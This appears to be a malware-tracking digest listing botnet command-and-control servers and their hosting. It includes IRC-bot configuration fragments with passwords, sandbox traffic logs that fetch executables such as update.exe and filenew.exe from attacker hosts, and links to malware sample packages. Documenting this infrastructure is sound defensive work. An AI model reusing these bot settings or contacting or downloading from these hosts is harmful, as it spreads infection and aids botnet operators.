var $config = array(“server”=>”190.255.36.202”, “port”=>”7000”, “pass”=>””, “prefix”=>”vnc|”, “maxrand”=>”5”, “chan”=>”#vncpriv8”, “chan2″=>”#vnca”, “key”=>”vnc”, “modes”=>”+p”, “password”=>”vnc2011”, “trigger”=>”.”, “hostauth”=>”*” // infos about hosting: http://whois.domaintools.com/190.255.36.202
119.188.7.169(linux bots hosted in China Jinan China Unicom Shandong Province Network)
my $fakeproc = “/usr/sbin/httpd”; my $ircserver = “119.188.7.169”; my $ircport = “6667”; my $nickname = “scaner”; my $ident = “BoT”; my $channel = “#Love”; my $admin = “Mr_Love”; my $fullname = ” 6== 14R 6= 15i 6= 0p 6= 0p 6= 15e 6= 14R 6== “; more here: http://fikretibrahimi.d1s.org/osco.txt?? infos about hosting: http://whois.domaintools.com/119.188.7.169
208.67.252.171(botnet hosted in United States Lewisville Top Inc)
Remote Host Port Number 174.37.200.82 80 204.0.5.41 80 63.135.80.224 80 63.135.80.46 80 66.220.147.33 80 208.67.252.171 1234 PASS xxx JOIN #!nn! test MODE NEW-[USA|00|P|96374] -ix PONG 22 MOTD NICK NEW-[USA|00|P|96374] USER XP-3818 * 0 :COMPUTERNAME infos about hosting: http://whois.domaintools.com/208.67.252.171
worksextv.info(botnet hosted in United States New York Landis Holdings Inc)
worksextv.info 69.73.174.163 Outgoing connection to remote server: worksextv.info TCP port 6567 * Now talking in ##dev## * Topic is ” * Set by {XPCOL419329} on Mon Apr 04 21:19:04 There are 602 users and 829 invisible on 1 servers 3 unknown connection(s) 14 channels formed I have 1431 clients and 0 servers – Current LocalRead more...
server.actualizacionbancaria.com(botnet hosted in Russian Federation 2×4.ru Network
Remote Host Port Number 213.251.170.52 80 92.241.165.157 80 92.241.165.115 1863 PASS ngrBot NICK n{US|XPa}erlwgkj USER erlwgkj 0 0 :erlwgkj JOIN #start romeo PRIVMSG #start :[DNS]: Blocked 0 domain(s) – Redirected 32 domain(s) * Now talking in #start * Topic is ‘*mdns http://92.241.165.157/info *up http://92.241.165.157/update.exe 1BA1C9594D0F92FCDA7FB74E7882925B ‘ * Set by stringback on Wed Apr 06 08:06:25Read more...
40mb exe samples
again another package with trojan downloaders clickers porn trojans etc Download: http://5f5c754a.goneviral.com
178.162.244.175(botnet hosted in Germany Idealhosting Managed Servers)
Remote Host Port Number 178.162.244.175 6667 178.162.244.175 8053 178.162.244.176 80 212.174.70.101 80 46.45.138.126 80 46.45.138.139 80 82.151.139.103 80 82.151.139.109 80 MODE #oyun MODE #Sohbet MODE #MuhabbeT NICK mIRCTurK576609 USER mIRCTurk “” “Irc.mIRCTurkk.CoM” : e mIRC Www.mircturkk.Com NOTICE IRC : VERSION mIRC v6.03 Khaled Mardam-Bey JOIN #Radyo,#yarisma,#kelime,#Oyun,#Sohbet,#MuhabbeT MODE mIRCTurK576609 +i MODE #Radyo MODE #yarisma MODE #kelimeRead more...
l2u.biz(trojan downloader hosted in Germany Berlin Keyweb Ag Ip Network)
l2u.biz 87.118.99.89 Outgoing connection to remote server: l2u.biz TCP port 80 – HTTP Conversations: F87.118.99.89:80 – [l2u.biz] Request: GET /epilog/upd/opt.xml opt.xml: http://l2u.biz/epilog/upd/opt.xml http://l2u.biz/epilog/main.php http://l2u.biz/epilog/upd/patch.xml http://l2u.biz/epilog/upd/filenew.exe infos about hosting: http://whois.domaintools.com/87.118.99.89
hdpta2020.no-ip.info(porn trojan hosted in United States Woodstock Fdcservers.net)
hdpta2020.no-ip.info 67.159.63.102 exe file: http://bec01aaa.theseblogs.com
update.cygo.net(trojan clicker hosted in Korea, Republic Of Seoul Thrunet Co. Ltd)
update.cygo.net 211.110.16.132 Outgoing connection to remote server: update.cygo.net TCP port 80 Network Activity – DNS Queries: Name Query Type Query Result Successful Protocol partner.cygo.net DNS_TYPE_A 211.110.16.132 211.110.16.134 1 udp – HTTP Conversations: From ANUBIS:1033 to 211.110.16.134:80 – [update.cygo.net] Request: GET /csrssp.dll Response: 200 “OK” From ANUBIS:1034 to 211.110.16.132:80 – [partner.cygo.net] Request: POST /check.php Response: 200Read more...